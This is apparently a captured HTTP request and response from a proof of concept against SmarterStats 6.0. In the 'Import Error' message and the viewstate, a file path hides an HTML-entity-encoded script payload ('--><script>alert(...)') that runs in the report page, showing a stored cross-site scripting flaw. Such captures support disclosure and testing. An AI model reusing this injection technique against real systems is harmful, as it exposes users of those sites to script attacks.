
Request

GET /Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=Webmaster HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; STTTState=; STHashCookie={"CountsGuid":"1008079301","TopBarSection":"UserDemographics"}]]>>

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:03:23 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 44346



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Reporting/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmViewReports.aspx?Custom=False&amp;ReportType=Standard&amp;subReportName=Webmaster" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTIyNzU0MjE4NQ8WBB4QX19fUmVzdWx0RmFpbHVyZQWZBEltcG9ydCBFcnJvcjogMTAvMTEvMjAxMCA4OjAyIFBNIC0gRVJST1I6IENvdWxkIG5vdCBzYXZlIFNpdGVIaXN0b3J5IGZpbGUgQzpcJiN4MDAyMjsmI3gwMDJEOyYjeDAwMkQ7JiN4MDAzRTsmI3gwMDNDOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0OyYjeDAwM0U7JiN4MDA2MTsmI3gwMDZDOyYjeDAwNjU7JiN4MDA3MjsmI3gwMDc0OyYjeDAwMjg7JiN4MDAzMDsmI3gwMDc4OyYjeDAwMzA7JiN4MDAzMDsmI3gwMDMwOyYjeDAwMzc7JiN4MDA0NjsmI3gwMDM3OyYjeDAwMjk7JiN4MDAzQzsmI3gwMDJGOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0O1xXZWJMb2dzXDFcU2l0ZUNvbmZpZy54bWwubmV3My4gIEFzIGEgcHJlY2F1dGlvbiwgdGhpcyBzZXJ2ZXIgaGFzIGJlZW4gcGF1c2VkLiAgQSByZWJvb3QgbWF5IGJlIHRoZSBiZXN0IHdheSB0byBzb2x2ZSBhbnkgZmlsZSBsb2NraW5nIHByb2JsZW1zIHRoYXQgbWF5IGJlIHByZXNlbnQuPGJyPjxicj48YnI+PGJyPh4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYMAgMPZBYCAgEPZBYCAgEPZBYCZg9kFggCAQ8PFgIeB1Zpc2libGVoZGQCAw8PFgIeF0NsaWVudFNpZGVTY3JpcHRPbkNsaWNrBRJFbWFpbFJlcG9ydFBvcHVwKClkZAIFDw8WAh8DBRNFeHBvcnRSZXBvcnRQb3B1cCgpZGQCBw8PFgIfAwUSUHJpbnRSZXBvcnRQb3B1cCgpZGQCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsfAmhkAgYPFgIfAmhkAgcPZBYCZg9kFgICAQ9kFgICAQ8WAh4EVGV4dAW7BDxkaXYgY2xhc3M9IlRpcFRleHRGYWlsdXJlIj5JbXBvcnQgRXJyb3I6IDEwLzExLzIwMTAgODowMiBQTSAtIEVSUk9SOiBDb3VsZCBub3Qgc2F2ZSBTaXRlSGlzdG9yeSBmaWxlIEM6XCYjeDAwMjI7JiN4MDAyRDsmI3gwMDJEOyYjeDAwM0U7JiN4MDAzQzsmI3gwMDczOyYjeDAwNjM7JiN4MDA3MjsmI3gwMDY5OyYjeDAwNzA7JiN4MDA3NDsmI3gwMDNFOyYjeDAwNjE7JiN4MDA2QzsmI3gwMDY1OyYjeDAwNzI7JiN4MDA3NDsmI3gwMDI4OyYjeDAwMzA7JiN4MDA3ODsmI3gwMDMwOyYjeDAwMzA7JiN4MDAzMDsmI3gwMDM3OyYjeDAwNDY7JiN4MDAzNzsmI3gwMDI5OyYjeDAwM0M7JiN4MDAyRjsmI3gwMDczOyYjeDAwNjM7JiN4MDA3MjsmI3gwMDY5OyYjeDAwNzA7JiN4MDA3NDtcV2ViTG9nc1wxXFNpdGVDb25maWcueG1sLm5ldzMuICBBcyBhIHByZWNhdXRpb24sIHRoaXMgc2VydmVyIGhhcyBiZWVuIHBhdXNlZC4gIEEgcmVib290IG1heSBiZSB0aGUgYmVzdCB3YXkgdG8gc29sdmUgYW55IGZpbGUgbG9ja2luZyBwcm9ibGVtcyB0aGF0IG1heSBiZSBwcmVzZW50Ljxicj48YnI+PGJyPjxicj48L2Rpdj5kAggPFgIfAmhkAgkPZBYCAgEPZBYeAgMPDxYQHgxTZWxlY3RlZERhdGUGAMBRYzcyzQgeB01pbkRhdGUGAEDK+KPo4AceB01heERhdGUGAABowSlcoQkeHEVuYWJsZUVtYmVkZGVkQmFzZVN0eWxlc2hlZXRoHhNFbmFibGVFbWJlZGRlZFNraW5zaB4EU2tpbgUMU21hcnRlclRvb2xzHghDc3NDbGFzcwUSRGF0ZVBpY2tlck92ZXJyaWRlHgRfIVNCAgJkFgZmDxQrAAgPFhIfCmgfCwUMU21hcnRlclRvb2xzHwgGAABowSlcoQkeDU9yaWdpbmFsVmFsdWUFFTEwLzUvMjAxMCAxMjowMDowMCBBTR8FBRMyMDEwLTEwLTA1LTAwLTAwLTAwHg1MYWJlbENzc0NsYXNzBQdyaUxhYmVsHhdFbmFibGVBamF4U2tpblJlbmRlcmluZ2gfCWgfBwYAQMr4o+jgB2QWBh4FV2lkdGgbAAAAAAAAWUAHAAAAHwwFEXJpVGV4dEJveCByaUhvdmVyHw0CggIWBh8RGwAAAAAAAFlABwAAAB8MBRFyaVRleHRCb3ggcmlFcnJvch8NAoICFgYfERsAAAAAAABZQAcAAAAfDAUTcmlUZXh0Qm94IHJpRm9jdXNlZB8NAoICFgYfERsAAAAAAABZQAcAAAAfDAUTcmlUZXh0Qm94IHJpRW5hYmxlZB8NAoICFgYfERsAAAAAAABZQAcAAAAfDAUUcmlUZXh0Qm94IHJpRGlzYWJsZWQfDQKCAhYGHxEbAAAAAAAAWUAHAAAAHwwFEXJpVGV4dEJveCByaUVtcHR5Hw0CggIWBh8RGwAAAAAAAFlABwAAAB8MBRByaVRleHRCb3ggcmlSZWFkHw0CggJkAgEPDxYEHghJbWFnZVVybAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYeDUhvdmVySW1hZ2VVcmwFMi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L0NhbGVuZGFyTW9udGguZ2lmFgIeB29uY2xpY2sFPHJldHVybiBDYWxlbmRhclBvcHVwKCRmaW5kKCdjdGwwMF9NUEhfUmFkU3RhcnREYXRlJyksJ2NhbCcpO2QCAg8UKwANDxYaBQ9SZW5kZXJJbnZpc2libGVnBRFFbmFibGVNdWx0aVNlbGVjdGgFFkZhc3ROYXZpZ2F0aW9uUHJldlRleHRlBRFWaWV3U2VsZWN0b3JJbWFnZQUqL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodDIuZ2lmBQRNaW5EBgBAyvij6OAHBQ1TZWxlY3RlZERhdGVzDwWPAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkRhdGVUaW1lQ29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUOUm93SGVhZGVySW1hZ2UFKS9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQuZ2lmBRJOYXZpZ2F0aW9uTmV4dFRleHRlBQNFUlNoBRJOYXZpZ2F0aW9uUHJldlRleHRlBQtTcGVjaWFsRGF5cw8FkgFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5DYWxlbmRhckRheUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuNDAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAAFFkZhc3ROYXZpZ2F0aW9uTmV4dFRleHRlBQRNYXhEBgAAaMEpXKEJDxYIHwsFDFNtYXJ0ZXJUb29scx8KaB8JaB8QaGRkFgQfDAULcmNNYWluVGFibGUfDQICFgQfDAUMcmNPdGhlck1vbnRoHw0CAmQWBB8MBQpyY1NlbGVjdGVkHw0CAmQWBB8MBQpyY0Rpc2FibGVkHw0CAhYEHwwFDHJjT3V0T2ZSYW5nZR8NAgIWBB8MBQlyY1dlZWtlbmQfDQICFgQfDAUHcmNIb3Zlch8NAgIWBB8MBTZSYWRDYWxlbmRhck1vbnRoVmlldyBSYWRDYWxlbmRhck1vbnRoVmlld19TbWFydGVyVG9vbHMfDQICFgQfDAUJcmNWaWV3U2VsHw0CAmQCBw8PFhAfBgYAQMxh7jbNCB8HBgBAyvij6OAHHwgGAABowSlcoQkfCWgfCmgfCwUMU21hcnRlclRvb2xzHwwFEkRhdGVQaWNrZXJPdmVycmlkZR8NAgJkFgZmDxQrAAgPFhIfCmgfCwUMU21hcnRlclRvb2xzHwgGAABowSlcoQkfDgUWMTAvMTEvMjAxMCAxMjowMDowMCBBTR8FBRMyMDEwLTEwLTExLTAwLTAwLTAwHw8FB3JpTGFiZWwfEGgfCWgfBwYAQMr4o+jgB2QWBh8RGwAAAAAAAFlABwAAAB8MBRFyaVRleHRCb3ggcmlIb3Zlch8NAoICFgYfERsAAAAAAABZQAcAAAAfDAURcmlUZXh0Qm94IHJpRXJyb3IfDQKCAhYGHxEbAAAAAAAAWUAHAAAAHwwFE3JpVGV4dEJveCByaUZvY3VzZWQfDQKCAhYGHxEbAAAAAAAAWUAHAAAAHwwFE3JpVGV4dEJveCByaUVuYWJsZWQfDQKCAhYGHxEbAAAAAAAAWUAHAAAAHwwFFHJpVGV4dEJveCByaURpc2FibGVkHw0CggIWBh8RGwAAAAAAAFlABwAAAB8MBRFyaVRleHRCb3ggcmlFbXB0eR8NAoICFgYfERsAAAAAAABZQAcAAAAfDAUQcmlUZXh0Qm94IHJpUmVhZB8NAoICZAIBDw8WBB8SBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZh8TBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZhYCHxQFOnJldHVybiBDYWxlbmRhclBvcHVwKCRmaW5kKCdjdGwwMF9NUEhfUmFkRW5kRGF0ZScpLCdjYWwnKTtkAgIPFCsADQ8WGgUPUmVuZGVySW52aXNpYmxlZwURRW5hYmxlTXVsdGlTZWxlY3RoBRZGYXN0TmF2aWdhdGlvblByZXZUZXh0ZQURVmlld1NlbGVjdG9ySW1hZ2UFKi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQyLmdpZgUETWluRAYAQMr4o+jgBwUNU2VsZWN0ZWREYXRlcw8FjwFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5EYXRlVGltZUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuNDAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAAFDlJvd0hlYWRlckltYWdlBSkvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0LmdpZgUSTmF2aWdhdGlvbk5leHRUZXh0ZQUDRVJTaAUSTmF2aWdhdGlvblByZXZUZXh0ZQULU3BlY2lhbERheXMPBZIBVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuQ2FsZW5kYXJEYXlDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjQwLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwAABRZGYXN0TmF2aWdhdGlvbk5leHRUZXh0ZQUETWF4RAYAAGjBKVyhCQ8WCB8LBQxTbWFydGVyVG9vbHMfCmgfCWgfEGhkZBYEHwwFC3JjTWFpblRhYmxlHw0CAhYEHwwFDHJjT3RoZXJNb250aB8NAgJkFgQfDAUKcmNTZWxlY3RlZB8NAgJkFgQfDAUKcmNEaXNhYmxlZB8NAgIWBB8MBQxyY091dE9mUmFuZ2UfDQICFgQfDAUJcmNXZWVrZW5kHw0CAhYEHwwFB3JjSG92ZXIfDQICFgQfDAU2UmFkQ2FsZW5kYXJNb250aFZpZXcgUmFkQ2FsZW5kYXJNb250aFZpZXdfU21hcnRlclRvb2xzHw0CAhYEHwwFCXJjVmlld1NlbB8NAgJkAgkPFgIfAmhkAgsPFgIfAmhkAg0PFgIfAmhkAg8PFgIfAmhkAhEPFgIfAmhkAhMPFgIfAmhkAhUPFgIfAmhkAhcPFgIfAmhkAhkPFgIfAmgWAgIBDxBkZBYAZAIbDxYCHwJoZAIdDxYCHwJoZAIfDxYCHwJoZAIhDw8WAh8FBQpHZXQgUmVwb3J0ZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgYFFmN0bDAwJE1QSCRSYWRTdGFydERhdGUFH2N0bDAwJE1QSCRSYWRTdGFydERhdGUkY2FsZW5kYXIFH2N0bDAwJE1QSCRSYWRTdGFydERhdGUkY2FsZW5kYXIFFGN0bDAwJE1QSCRSYWRFbmREYXRlBR1jdGwwMCRNUEgkUmFkRW5kRGF0ZSRjYWxlbmRhcgUdY3RsMDAkTVBIJFJhZEVuZERhdGUkY2FsZW5kYXKTgIeSE/kwhinT4a3Qhsjk7T/NRv2iB6x/fy0Bw6CLSQ==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=ViSwXssY2t4u-Qbx4w6bru0KSpyf_B0vCVudPBQgSL7pdZgJgsa-ZWozxrSKwrw9y9GZsHwVVOrd1WeIw5NPwP1jyRtmNpMtMhXJtQ7Ds3FNebDhERVTBNBcItEGfJ6GlPm0maqMQuQbXCRuE2OSeQ2&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=b_zxvPWW2bmUI7-yPqxdjxNcYGLbh-5zreoWPsyuSsM904jjxphVYn3M53uzsMEtA28xV93yhZNeO7aopeQCsRrqUrg4Mn087e0aShAFwwmtOSohzmSffW6uJ6_AtQVWulXcR71k6brUxjM0zkq5aQ2&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=rLkVatSveEIPrLuVrqd-Rqu9c-Qp5n3u_agt7bqrbK66Z1GODOCn_TqYoCtv79JakYjGy-hs5HVRebk_BZqNoTXEExvRXPbqgtEiHRkA8jwIrcayoDlnuZWpcWkdnNZ0Xh2nW6TTKEXMqhxGKpfZuDd_ibYZO_jwoRaEz-gTuis1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=_lSjFkDxd3Gnr7ocFU6QUkZOrdHPnZsqNRClSK61AtN-ATLEiBiN0mgZ6qde0SYytY9Y7JPZGbAn0G1XxGzBJPMqZRiXEJK-nZxx5QIbzRoDB5Syl5oGPlUxKWDON3Z5Ld0hMHW-sKkMnHWb_hwzCyUGXoXIUKoCDwj5C88getY1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=JOd_zE-rVnhst9gjbTnWxhkLnomfRJOvAba74jYUNOYndrLTcDyBPLUH4sKs48Lj5n5-lBATFKj-hFHq_rS8K95dEYHJCXJBFm6TbI7MrJu3R7ZD9vx_k8jaeCbKbroCzLu5qdhlqN8jh5PII2qVOLUrmc7F1nKNJN5I5VXGXQI1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=dim8nyrCK3sbBE3vfEjhnHLVQjoQa7K4EDVi51FwrwWZRYjEGIN1TgwIRvo7NIo5VbnkeJxu3LEwuEak1hX108zj9QGEZyRv54Qk_tiJNRVGHTif1EoYWVv49mnpinZUuNk-PXItaRDiww30xt64kKGWlIR8GsCqaB2e72wdFJ01&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=M1ICYTROEq6Ql9y7PDNqrCxwQa2kits8uxrGGwbPfC-BHyJqGbMtKJgZywmD6smfBh2fWMrA8N_QYL5pca4CHQunZwujs5xpqHQQBRkMLnZ1axo0M2uf3lHNZ83m5kv_rhsD90Pm968qBTe6ctQmcba0FFtJnkHipWazocyhYiQ1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
var PageMethods = function() {
PageMethods.initializeBase(this);
this._timeout = 0;
this._userContext = null;
this._succeeded = null;
this._failed = null;
}
PageMethods.prototype = {
_get_path:function() {
var p = this.get_path();
if (p) return p;
else return PageMethods._staticInstance.get_path();},
GetReportProgress:function(guid,succeededCallback, failedCallback, userContext) {
return this._invoke(this._get_path(), 'GetReportProgress',false,{guid:guid},succeededCallback,failedCallback,userContext); }}
PageMethods.registerClass('PageMethods',Sys.Net.WebServiceProxy);
PageMethods._staticInstance = new PageMethods();
PageMethods.set_path = function(value) { PageMethods._staticInstance.set_path(value); }
PageMethods.get_path = function() { return PageMethods._staticInstance.get_path(); }
PageMethods.set_timeout = function(value) { PageMethods._staticInstance.set_timeout(value); }
PageMethods.get_timeout = function() { return PageMethods._staticInstance.get_timeout(); }
PageMethods.set_defaultUserContext = function(value) { PageMethods._staticInstance.set_defaultUserContext(value); }
PageMethods.get_defaultUserContext = function() { return PageMethods._staticInstance.get_defaultUserContext(); }
PageMethods.set_defaultSucceededCallback = function(value) { PageMethods._staticInstance.set_defaultSucceededCallback(value); }
PageMethods.get_defaultSucceededCallback = function() { return PageMethods._staticInstance.get_defaultSucceededCallback(); }
PageMethods.set_defaultFailedCallback = function(value) { PageMethods._staticInstance.set_defaultFailedCallback(value); }
PageMethods.get_defaultFailedCallback = function() { return PageMethods._staticInstance.get_defaultFailedCallback(); }
PageMethods.set_enableJsonp = function(value) { PageMethods._staticInstance.set_enableJsonp(value); }
PageMethods.get_enableJsonp = function() { return PageMethods._staticInstance.get_enableJsonp(); }
PageMethods.set_jsonpCallbackParameter = function(value) { PageMethods._staticInstance.set_jsonpCallbackParameter(value); }
PageMethods.get_jsonpCallbackParameter = function() { return PageMethods._staticInstance.get_jsonpCallbackParameter(); }
PageMethods.set_path("frmViewReports.aspx");
PageMethods.GetReportProgress= function(guid,onSuccess,onFailed,userContext) {PageMethods._staticInstance.GetReportProgress(guid,onSuccess,onFailed,userContext); }
//]]>
</script>


       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$BPH$UpdatePanel2','','tctl00$UpdatePanel1','','tctl00$MPH$UpdatePanel1','','tctl00$MPH$UP1',''], ['ctl00$MPH$btnGenerateReport','','ctl00$MPH$btnShowReport',''], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       View Report
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_UpdatePanel2">
   
           
           <div id="ctl00_BPH_btnSendEmail" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="EmailReportPopup(); return false;"><span class="BBInner">Email</span></a></div>
           <div id="ctl00_BPH_btnExport" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ExportReportPopup(); return false;"><span class="BBInner">Export</span></a></div>
           <div id="ctl00_BPH_btnPrint" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="PrintReportPopup(); return false;"><span class="BBInner">Print</span></a></div>
       
</div>

           </div>
           <div class="ButtonBarRight">
               

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               <div id="ctl00_TipTextDiv" class="TipTextContainer">
                   <div class="TipTextFailure">Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\WebLogs\1\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.<br><br><br><br></div>
               </div>
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div class="ReportLoadingProgress" id="ReportLoadingProgress">
       <div class="ProgressContainer" id="ProgressContainer">
           <div class="ProgressBar" id="ProgressBar">
           </div>
       </div>
       <div class="ProgressText" id="ProgressText">
       </div>
   </div>
   <div id="ctl00_MPH_ReportBar" class="ReportOptionsBar">
       <div class='ReportOptionSection'>
           <div>
               <table class='ReportOptionSection'>
                   <tr>
                       <td class='ReportItemOptionLabel'>
                           Date Range
                       </td>
                       <td>
                           <div id="ctl00_MPH_RadStartDate_wrapper" class="RadPicker RadPicker_SmarterTools DatePickerOverride" style="display:inline-block;width:150px;">
   <!-- 2010.2.817.40 --><input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadStartDate" name="ctl00$MPH$RadStartDate" type="text" class="rdfd_" value="2010-10-05" /><table cellspacing="0" class="rcTable" style="width:100%;">
       <tr>
           <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_RadStartDate_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;white-space:normal;"><input type="text" value="10/5/2010" id="ctl00_MPH_RadStartDate_dateInput_text" name="ctl00_MPH_RadStartDate_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadStartDate_dateInput" name="ctl00$MPH$RadStartDate$dateInput" type="text" class="rdfd_" value="2010-10-05-00-00-00" /><input id="ctl00_MPH_RadStartDate_dateInput_ClientState" name="ctl00_MPH_RadStartDate_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the calendar popup." href="#" id="ctl00_MPH_RadStartDate_popupButton" onclick="return CalendarPopup($find(&#39;ctl00_MPH_RadStartDate&#39;),&#39;cal&#39;);"><img id="ctl00_MPH_RadStartDate_CalendarPopupButton" src="/App_Themes/Default/Images/16x16/CalendarMonth.gif" alt="Open the calendar popup." style="border-width:0px;" /></a><div id="ctl00_MPH_RadStartDate_calendar_wrapper" style="display: none" ><table id="ctl00_MPH_RadStartDate_calendar" summary="Calendar" cellspacing="0" class="RadCalendar RadCalendar_SmarterTools" border="0">
               <thead>
                   <tr>
                       <td class="rcTitlebar"><table cellspacing="0" summary="title and navigation" border="0">
                           <tr>
                               <td><a id="ctl00_MPH_RadStartDate_calendar_FNP" class="rcFastPrev" title="&lt;&lt;" href="#"></a></td><td><a id="ctl00_MPH_RadStartDate_calendar_NP" class="rcPrev" title="&lt;" href="#"></a></td><td id="ctl00_MPH_RadStartDate_calendar_Title" class="rcTitle">October 2010</td><td><a id="ctl00_MPH_RadStartDate_calendar_NN" class="rcNext" title=">" href="#"></a></td><td><a id="ctl00_MPH_RadStartDate_calendar_FNN" class="rcFastNext" title=">>" href="#"></a></td>
                           </tr>
                       </table></td>
                   </tr>
               </thead><tbody>
   <tr>
       <td class="rcMain"><table id="ctl00_MPH_RadStartDate_calendar_Top" class="rcMainTable" cellspacing="0" summary="October 2010" border="0">
   <thead>
       <tr class="rcWeek">
           <th id="ctl00_MPH_RadStartDate_calendar_Top_cs_0" title="Sunday" abbr="Sun" scope="col">S</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_1" title="Monday" abbr="Mon" scope="col">M</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_2" title="Tuesday" abbr="Tue" scope="col">T</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_3" title="Wednesday" abbr="Wed" scope="col">W</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_4" title="Thursday" abbr="Thu" scope="col">T</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_5" title="Friday" abbr="Fri" scope="col">F</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_6" title="Saturday" abbr="Sat" scope="col">S</th>
       </tr>
   </thead><tbody>
       <tr class="rcRow">
           <td class="rcOtherMonth" title="Sunday, September 26, 2010"><a href="#">26</a></td><td class="rcOtherMonth" title="Monday, September 27, 2010"><a href="#">27</a></td><td class="rcOtherMonth" title="Tuesday, September 28, 2010"><a href="#">28</a></td><td class="rcOtherMonth" title="Wednesday, September 29, 2010"><a href="#">29</a></td><td class="rcOtherMonth" title="Thursday, September 30, 2010"><a href="#">30</a></td><td title="Friday, October 01, 2010"><a href="#">1</a></td><td class="rcWeekend" title="Saturday, October 02, 2010"><a href="#">2</a></td>
       </tr><tr class="rcRow">
